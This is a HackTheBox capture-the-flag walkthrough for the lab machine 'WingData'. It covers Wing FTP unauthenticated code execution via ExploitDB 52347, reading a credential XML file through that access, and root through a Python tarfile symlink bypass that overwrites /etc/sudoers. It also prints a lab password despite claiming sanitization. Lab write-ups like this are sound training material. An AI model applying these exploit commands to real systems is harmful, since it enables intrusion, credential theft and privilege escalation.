WingData
WingData is a sanitized machine note from the local HTB archive, organized for quick review by category, difficulty, evidence flow, and reusable operator
Scenario
WingData attack path
WingData is a sanitized machine note from the local HTB archive, organized for quick review by category, difficulty, evidence flow, and reusable operator
Objective
Machine walkthrough focused on Machines evidence, validation, and reusable operator lessons.
Walkthrough flow
Scope and service discovery
Attack surface mapping
Initial foothold
Privilege escalation
Proof captured
Source coverage
Moderate source coverage
Status: partial. This article is generated from 3 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.
Moderate confidence: the page is useful for review, but it should be treated as partial because the available source material is thinner or less narrative-complete.
- <TARGET>-WingData/walkthrough.md
- HTB/<TARGET>-WingData/notes.md
- HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-WingData__notes.md.29356ff870.md
Technical Walkthrough
WingData - Walkthrough
Summary
Easy Linux box. Wing FTP Server unauthenticated RCE (<secret redacted>) for foothold, credential extraction from XML configs for SSH as wacky, then Python tarfile PATH_MAX symlink bypass (<secret redacted>) for root.
Attack Chain
1. Reconnaissance
nmap -sC -sV -p 22,80,5466 <TARGET>- Port 22: OpenSSH 9.2p1 Debian
- Port 80: Apache 2.4.66 serving wingdata.htb
- Port 5466: filtered
- VHost
ftp.wingdata.htbserves Wing FTP Server web interface
2. Foothold - <secret redacted> (Wing FTP RCE)
Exploit: ExploitDB 52347. NULL byte in username bypasses auth, Lua payload injected into session file, triggered via /dir.html.
python3 52347.py -u http://ftp.wingdata.htb -c 'id'
# uid=1000(wingftp)3. Credential Extraction
Used RCE to read Wing FTP config:
python3 52347.py -u http://ftp.wingdata.htb -c 'cat /opt/wftpserver/Data/1/users/wacky.xml|base64'Found SHA-256 hash for user wacky:
<hash redacted>Password salting enabled (salt: "WingFTP") but pre-researched password worked:
!#7Blushing^*Bride54. User Flag
ssh wacky@<TARGET> # password: <redacted>
cat ~/user.txt
# <hash redacted>5. Privilege Escalation - <secret redacted>
sudo -l shows:
(root) NOPASSWD: /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *The script calls tarfile.extractall(path=staging_dir, filter="data") on user-controlled tar files. Python 3.12.3 is vulnerable to <secret redacted> (PATH_MAX symlink bypass).
Exploit creates:
- Deep nested directories (16 levels, 247-char names) exceeding PATH_MAX
- Symlink chain traversing back up
- Escape symlink pointing to /etc
- Hardlink through escape to /etc/sudoers
- Regular file content overwriting sudoers
python3 /tmp/gen_tar.py
cp /tmp/exploit.tar /opt/backup_clients/backups/backup_9999.tar
sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py -b backup_9999.tar -r restore_exploitResult: /etc/sudoers now contains wacky ALL=(ALL) NOPASSWD: ALL
6. Root Flag
sudo cat /root/root.txt
# <hash redacted>CVEs Used
- <secret redacted> - Wing FTP Server <= 7.4.3 unauthenticated RCE via NULL byte + Lua injection
- <secret redacted> - Python tarfile PATH_MAX symlink filter bypass for arbitrary file write
Time: ~8 minutes from first scan to root
Source-Backed Dossier
The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.
Notes
Scope
- Target: <TARGET> (wingdata.htb)
- OS: Linux (Debian 12)
- Difficulty: Easy
- Pwnbox: <TARGET> (profex0r)
- VPN IP: <TARGET>
- Date: 2026-05-07
Evidence Ledger
| Timestamp | Action | Finding |
|---|---|---|
| 00:46 | nmap -sC -sV -p 22,80,5466 | 22/SSH open, 80/HTTP open (Apache 2.4.66), 5466 filtered |
| 00:47 | curl ftp.wingdata.htb | Wing FTP Server web interface confirmed |
| 00:48 | <secret redacted> RCE test (id) | uid=1000(wingftp) confirmed |
| 00:49 | Read wacky.xml via RCE | SHA-256 hash: <hash redacted> |
| 00:49 | Salt check | <password redacted>=1, SaltingString=WingFTP |
| 00:50 | SSH as wacky | Password !#7Blushing^*Bride5 works |
| 00:50 | cat ~/user.txt | <hash redacted> |
| 00:51 | sudo -l | (root) NOPASSWD: restore_backup_clients.py * |
| 00:51 | Python version | 3.12.3 (vulnerable to <secret redacted>) |
| 00:53 | <secret redacted> exploit | /etc/sudoers overwritten - wacky ALL=(ALL) NOPASSWD: ALL |
| 00:53 | sudo cat /root/root.txt | <hash redacted> |
Flags
- User: <hash redacted>
- Root: <hash redacted>
Credentials
| User | Password | Source |
|---|---|---|
| wacky | !#7Blushing^*Bride5 | Wing FTP XML hash cracked (SHA-256) |
Notes
Scope
- Target: <TARGET> (wingdata.htb)
- OS: Linux (Debian 12)
- Difficulty: Easy
- Pwnbox: <TARGET> (<<secret redacted>>)
- VPN IP: <TARGET>
- Date: 2026-05-07
Evidence Ledger
| Timestamp | Action | Finding |
|---|---|---|
| 00:46 | nmap -sC -sV -p 22,80,5466 | 22/SSH open, 80/HTTP open (Apache 2.4.66), 5466 filtered |
| 00:47 | curl ftp.wingdata.htb | Wing FTP Server web interface confirmed |
| 00:48 | <secret redacted> RCE test (id) | uid=1000(wingftp) confirmed |
| 00:49 | Read wacky.xml via RCE | SHA-256 hash: <hash redacted> |
| 00:49 | Salt check | <password redacted>=1, SaltingString=WingFTP |
| 00: <REDACTED> | ||
| 00:50 | cat ~/user.txt | <<secret redacted>> |
| 00:51 | sudo -l | (root) NOPASSWD: restore_backup_clients.py * |
| 00:51 | Python version | 3.12.3 (vulnerable to <secret redacted>) |
| 00:53 | <secret redacted> exploit | /etc/sudoers overwritten - wacky ALL=(ALL) NOPASSWD: ALL |
| 00:53 | sudo cat /root/root.txt | <<secret redacted>> |
Flags
- User: <<secret redacted>>
- Root: <<secret redacted>>
Credentials
| User | Password | Source |
|---|---|---|
| wacky | !#7Blushing^*Bride5 | Wing FTP XML hash cracked (SHA-256) |